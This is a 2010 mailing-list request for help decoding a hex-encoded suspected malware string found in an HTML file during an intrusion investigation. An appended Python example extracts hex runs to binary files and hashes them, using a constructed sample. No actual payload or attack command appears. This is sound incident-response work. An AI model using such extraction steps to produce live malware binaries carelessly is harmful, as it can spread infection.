[ale] Need a simple perl (etc.) program, but I don't speak perl

Greg Freemyer greg.freemyer at gmail.com
Thu Jun 3 10:58:05 EDT 2010


All,

I'm looking at an intrusion and found the attached very suspicious
html file (I added a .bin extension so it would not be associated with a
browser, etc.).

Anyway, within it there is a string (see below) that I think is the
hex expression (see below) of malware that I need converted to binary.
Can someone help me out with a perl script to convert? Or even
better, convert it to binary and seal it up in a password-protected
zip file. Use "infected" as the password. Thanks, Greg

== Potential malware representation


==
-------------- next part --------------
A non-text attachment was scrubbed...
Name: CF-03763.html.bin
Type: application/octet-stream
Size: 2070 bytes
Desc: not available
Url : http://mail.ale.org/pipermail/ale/attachments/20100603/746a86bf/attachment.bin 
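
The conversion requested above, as an added example in Python that is not part of the original post or thread. The string's exact encoding is not shown here, so the sketch assumes plain hex digits, `\xNN` or `%NN` escapes (a generalization beyond the single string in the post); all function names and the sample input are constructed for illustration.

```python
import hashlib
import re

# Assumed encodings (the post does not show the string's exact form):
# plain hex digits "4d5a90...", "\x4d\x5a..." escapes, "%4d%5a..." escapes.
# Short runs (under 8 escaped or 16 plain bytes) are ignored as likely noise,
# e.g. CSS colours.
HEX_RUN = re.compile(
    r"(?:(?:\\x|%)[0-9A-Fa-f]{2}){8,}|(?:[0-9A-Fa-f]{2}){16,}"
)

def decode_hex_runs(text):
    """Return one bytes object per hex-encoded run found in text."""
    blobs = []
    for match in HEX_RUN.finditer(text):
        digits = re.sub(r"\\x|%", "", match.group(0))
        blobs.append(bytes.fromhex(digits))
    return blobs

def describe(blob):
    """Summarise a decoded blob for case notes; nothing is executed."""
    return {
        "size": len(blob),
        "sha256": hashlib.sha256(blob).hexdigest(),
        "looks_like_pe": blob[:2] == b"MZ",
        "head_hex": blob[:16].hex(),
    }

def extract_to_files(path):
    """Decode every run in the file at path and write each as path.blobN.bin."""
    with open(path, "r", errors="replace") as fh:
        blobs = decode_hex_runs(fh.read())
    written = []
    for index, blob in enumerate(blobs):
        out = f"{path}.blob{index}.bin"
        with open(out, "wb") as fh:
            fh.write(blob)
        written.append((out, describe(blob)))
    return written

# Constructed sample input, not the content of the scrubbed attachment.
CONSTRUCTED_PAYLOAD = b"MZ constructed sample payload"
CONSTRUCTED_HTML = (
    '<html><script>var s="' + CONSTRUCTED_PAYLOAD.hex() + '";</script></html>'
)

if __name__ == "__main__":
    for blob in decode_hex_runs(CONSTRUCTED_HTML):
        print(describe(blob))
```

Python's standard `zipfile` module cannot create password-protected archives, so the sealing step asked for in the post needs an external archiver.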

